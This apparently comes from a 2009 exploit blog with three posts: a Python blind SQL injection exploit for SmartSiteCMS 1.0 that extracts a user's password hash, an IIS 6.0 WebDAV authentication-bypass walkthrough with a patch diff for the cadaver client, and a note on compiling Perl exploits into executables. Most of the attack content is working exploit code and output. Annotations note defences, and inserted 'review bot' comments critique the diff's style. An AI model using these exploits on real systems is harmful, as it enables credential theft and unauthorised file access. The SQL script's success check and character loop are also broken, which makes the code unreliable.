SmartSiteCMS 1.0 (articles.php var) Blind SQL Injection Exploit

Posted at Saturday, July 11, 2009

SmartSiteCMS 1.0 (articles.php var) Blind SQL Injection Exploit


#!/usr/bin/python

import sys
import re
from socket import *

# Boolean-based blind SQL injection probe for SmartSiteCMS 1.0.
#
# Risk: articles.php evidently concatenates the `var` request parameter
# into a SQL statement, so the value built in set_query() makes the database
# evaluate a comparison on one character of the `password` column for the
# given userName and leak the result through a difference in the HTTP reply.
# Mitigation (application side): bind `var` as a parameter of a prepared
# statement and validate it against the expected type before use.
# Detection: a burst of GET requests to /articles.php?var=... whose query
# string carries %27 and ASCII(SUBSTRING( is the on-wire signature of this
# probe (one request per candidate character, see the loop at the bottom).
#
# NOTE(review): Python 2 code (print statements, str written to a socket);
# the listing has lost its indentation and is documented here, not repaired.
class exploit:
# host: server name, connected to on TCP port 80 in check();
# path: URL prefix of the CMS install, prepended to /articles.php;
# user: value matched against userName in the injected subquery.
def __init__(self,host,path,user):
self.host=host
self.path=path
self.user=user
# An empty pattern matches at offset 0 of any string, so the search in
# check() always succeeds with match.start() == 0.
self.reg=re.compile("")
# Build the raw HTTP/1.0 request whose `var` parameter asks whether
# character n (1-based) of the user's stored password equals ch.
def set_query(self,n,ch):
self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2"
# Minimal URL encoding: only spaces and single quotes are escaped.
self.query = self.query.replace(" ","%20")
self.query = self.query.replace("'","%27")
# The header block is terminated by "\r\n\n" (a bare "\n" after the CRLF).
self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n"
# Send the request built by set_query() and read the whole reply.
# Returns 1 when the reply holds any byte at offsets 27..58, else 0.
def check(self):
sock=socket(AF_INET, SOCK_STREAM)
sock.connect((self.host, 80))
sock.send(self.request)
r=""
t="-"
# recv() returns "" once the server closes the connection (HTTP/1.0).
while(t!=""):
t=sock.recv(1024)
r+=t
# self.reg is the empty pattern, so match.start() is always 0 and the
# slice below is r[27:59]; it is non-empty whenever len(r) > 27.
match=self.reg.search(r)
if(r[match.start()+27:match.start()+59]!=""):
return 1
else:
return 0
# Unreachable: both branches above return first, so the socket is never
# closed explicitly (it is released when `sock` goes out of scope).
sock.close()

# Banner (Python 2 print statements).
print "////*****************************************\\\\\\\\"
print "|||| smartSiteCMS 1.0 v1.0 ||||"
print "|||| Blind SQL injection ||||"
print "|||| ||||"
print "|||| ~Author: certaindeath ||||"
print "|||| ~Greetz: darkjoker ||||"
print "\\\\\\\\************************************* ****////\n"

# Exactly three arguments are required: host, CMS path prefix, userName
# (the example line shows the order; the argument names in the usage line
# were lost when the post was formatted).
if(len(sys.argv) !=4 ):
print "Usage: python xpl.py "
print "Example: python xpl.py localhost /cms admin"
sys.exit(0)

# Recover 32 characters (the length of a hex MD5 digest, see the final
# print) one position at a time: for position n, step t upward until
# check() reports a match and append the last character of hex(t).
pwd=""
xpl = exploit(sys.argv[1],sys.argv[2],sys.argv[3])
n=1
while(n<=32):
t=0
# First candidate is the character "0" (str(0)).
xpl.set_query(n,str(t))
# No upper bound: this loop only ends when check() returns 1.
while (xpl.check()!=1):
t+=1
# str(hex(t))[-1] keeps only the last hex digit, e.g. hex(16) == '0x10'
# yields '0', so values of t above 15 re-test earlier digits.
xpl.set_query(n,str(hex(t))[-1])
pwd+=str(hex(t))[-1]
n+=1
print "pass [md5]: ",pwd

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)

Posted at Saturday, July 11, 2009

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)

# Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# --snip--
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# --snip--
# > tar xzvf cadaver-0.23.2.tar.gz
# --snip--
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# --snip--
# > make
# --snip--
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/': succeeded.
# password.txt 7 May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt':
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE
diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
--- cadaver-0.23.2/lib/neon/ne_basic.c 2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c 2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
value = "infinity";
break;
}
- ne_add_request_header(req, "Depth", value);
+ ne_add_request_header(req, "Depth", "1");
}

static int copy_or_move(ne_session *sess, int is_move, int overwrite,
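Review bot: With the Depth header now hard-coded to "1", the `value` variable assigned by the switch above (the `value = "infinity";` case is still visible in the context lines) appears to be set but never read, which compilers will flag as an unused assignment. Either remove the switch and the variable together, or keep the computed value and state why it is deliberately ignored, e.g. `/* Depth is forced to "1"; the value computed above is intentionally unused */`. The enclosing function begins before the hunk, so I cannot see whether `value` is read elsewhere in it.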
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
--- cadaver-0.23.2/lib/neon/ne_request.c 2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c 2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
"Connection: TE" EOL
"TE: trailers" EOL);
}
+ ne_buffer_czappend(req->headers, "Translate: f" EOL);
}

int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
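Review bot: The added `Translate: f` header is appended to every request unconditionally, with no comment saying why, so a reader of ne_request.c cannot tell it apart from the Connection/TE lines just above it that are guarded by a condition. A one-line comment on the added line, `/* always sent by this patched build; not part of stock neon */`, would make the behavioural change visible to whoever next touches this function. Because it is unconditional it is also the constant, method-independent part of this client's traffic, which is worth knowing when reading server logs. The enclosing function starts outside the hunk.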
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
const char *method, const char *path)
{
+ char *path2 = ne_calloc(strlen(path)+7);
ne_request *req = ne_calloc(sizeof *req);

req->session = sess;
@@ -435,13 +437,18 @@
req->method = ne_strdup(method);
req->method_is_head = (strcmp(method, "HEAD") == 0);

+ if(strlen(path)>2)
+ sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+ else
+ path2 = path;
+
/* Only use an absoluteURI here when absolutely necessary: some
* servers can't parse them. */
- if (req->session->use_proxy && !req->session->use_ssl && path[0] == '/')
+ if (req->session->use_proxy && !req->session->use_ssl && path2[0] == '/')
req->uri = ne_concat(req->session->scheme, "://",
- req->session->server.hostport, path, NULL);
+ req->session->server.hostport, path2, NULL);
else
- req->uri = ne_strdup(path);
+ req->uri = ne_strdup(path2);

{
struct hook *hk;
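Review bot: In the `else` branch `path2 = path;` assigns the `const char *` parameter to the non-const `path2`, discarding the qualifier, and abandons the buffer obtained from `ne_calloc(strlen(path)+7)` in the previous hunk (L148–155); in the other branch that buffer is duplicated by `ne_strdup(path2)` or `ne_concat(...)` and then also never released, so every request leaks it. Since both callees make their own copy, the rewritten path only needs to live until then: `else strcpy(path2, path);` keeps both branches on the heap buffer, and a `ne_free(path2);` after the `req->uri` assignment frees it. The `sprintf` is safe only because the allocation is sized exactly for the six inserted bytes plus the terminator, which deserves a comment so a later change to the format string does not overflow it. ne_request_create continues outside the hunk.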
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
--- cadaver-0.23.2/lib/neon/ne_uri.c 2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c 2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX x0 x2 x4 x6 x8 xA xC xE */
/* 0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/* 1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/* 2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/* 2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/* 3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/* 4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/* 5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,
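Review bot: Reclassifying 0x25 ('%') from PC to AL in this table carries no comment, and it is a global change: every percent sign in every URI this client builds is now treated as a plain letter by the escaper, presumably so the sequence inserted in ne_request_create is not re-encoded, but it also means a literal `%` in any legitimate path is no longer escaped. A one-line comment on the changed row, `/* 0x25 '%' reclassified as AL: percent sequences pass through unescaped */`, would at least make that side effect visible. The table continues on both sides of the hunk.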


Compiling Perl coded exploits

Posted at Saturday, July 11, 2009

Compiling Perl coded exploits

Active Perl

Features
Complete ActivePerl Package

* Perl
Binary of core Perl distribution
* Perl Package Manager
ActiveState's Perl extension installer and manager; allows for easy installation and management of modules and extensions
* Installers
A variety of installers are available for quick installation of ActivePerl:
o AIX: ActiveState installer packages
o HP-UX: ActiveState installer packages
o Linux: Redhat, Debian and ActiveState installer packages
o Mac OS X: Disk image containing the installer package
o Solaris: Sun and ActiveState installer packages
o Windows: Microsoft Windows (MSI) and ActiveState installer packages
* Complete online documentation

Windows Version Extras

* Perl for ISAPI
IIS plug-in to enhance the speed of standard Perl
* PerlScript
ActiveX scripting engine, like JavaScript or VBScript with a Perl brain
* PerlEz
Embedded Perl


http://downloads.activestate.com/Act...x86-148120.msi

OR
visit
http://downloads.activestate.com/Act...l/Windows/5.8/

for previous versions.

****************** not recommended ************************
Perl2Exe

Perl2Exe is a command line program for converting perl scripts to executable files.

This allows you to create stand alone programs in perl that do not require the perl interpreter. You can ship the executable files without having to ship your perl source code.

Perl2Exe can generate executables for Windows and Unix target hosts.

Perl2Exe can generate cross-platform code. For example you can generate code for Solaris from a Linux machine.

Perl2Exe also allows you to create no-console programs using Tk.

Download Perl2Exe for Win32 V8.60

http://www.indigostar.com/download/p2x-8.60-Win32.zip
(win 32)

Instruction Manual:

http://www.indigostar.com/pxman.htm